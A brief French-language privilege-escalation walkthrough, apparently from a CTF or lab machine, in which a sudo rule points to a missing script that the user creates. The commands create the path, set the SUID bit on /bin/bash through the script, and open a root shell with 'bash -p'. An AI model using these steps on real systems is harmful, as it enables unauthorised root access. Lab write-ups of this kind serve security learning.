Sudo (no such file) - Linux Privilege Escalation

Nous découvrons une vulnérabilité liée à l'exécution de scripts avec des privilèges sudo.

Le fichier monitor.sh semble être introuvable, mais nous pouvons créer un script qui sera exécuté en tant que root. Nous commençons par créer les répertoires nécessaires :

cd /home/nibbler
mkdir personal
cd !$
mkdir stuff
cd !$

Nous y plaçons le fichier monitor.sh avec le contenu suivant :

chmod u+s /bin/bash

Nous exécutons ensuite le script avec les privilèges sudo :

sudo /home/nibbler/personal/stuff/monitor.sh

Cela permet de modifier les permissions de /bin/bash en lui ajoutant le bit SUID. Nous exécutons alors la commande suivante pour obtenir un shell avec des privilèges root :

bash -p

Mis à jour il y a 1 an